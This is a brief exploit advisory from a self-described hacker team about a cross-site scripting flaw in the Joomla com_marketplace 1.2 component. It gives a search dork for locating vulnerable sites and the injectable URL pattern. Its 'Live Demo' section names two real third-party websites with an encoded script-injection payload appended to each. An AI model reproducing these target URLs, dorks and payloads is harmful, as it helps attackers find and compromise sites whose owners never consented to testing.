==============================================================================
                      __     __   __      __   __     __
                     /  \   /  \  \ \    / /  /  \   /  \
                    / /\ \_/ /\ \  \ \  / /  / /\ \_/ /\ \
                   / /  \ _ /  \ \  \ \/ /  / /  \ _ /  \ \
                  /_/           \_\  \__/  /_/           \_\

==============================================================================
        [»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
        [»] Joomla Component com_marketplace v1.2 [xss] Cross Site Scripting Vulnerability
==============================================================================

    [»] Script:             [ com_marketplace ]
    [»] Dork:               [ Marketplace Version 1.2 (c) 2005-2006 joomster.com  ]
    [»] Language:           [ PHP ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

    [»] http://[target].com/[path]/index.php?option=com_marketplace&page=show_category&catid=[Xss Vuln]



===[ Live Demo ]===

    [»] http://regiofirmen.de/joomla/index.php?option=com_marketplace&page=show_category&catid=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
    [»] http://andrychow.info/index.php?option=com_marketplace&page=show_category&catid=%22%3E%3Cscript%3Ealert(1);%3C/script%3E


Author: ViRuSMaN <-

###########################################################################
________________________________
Windows Live Hotmail: Your friends can get your Facebook updates, right from Hotmail®.<http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_4:092009>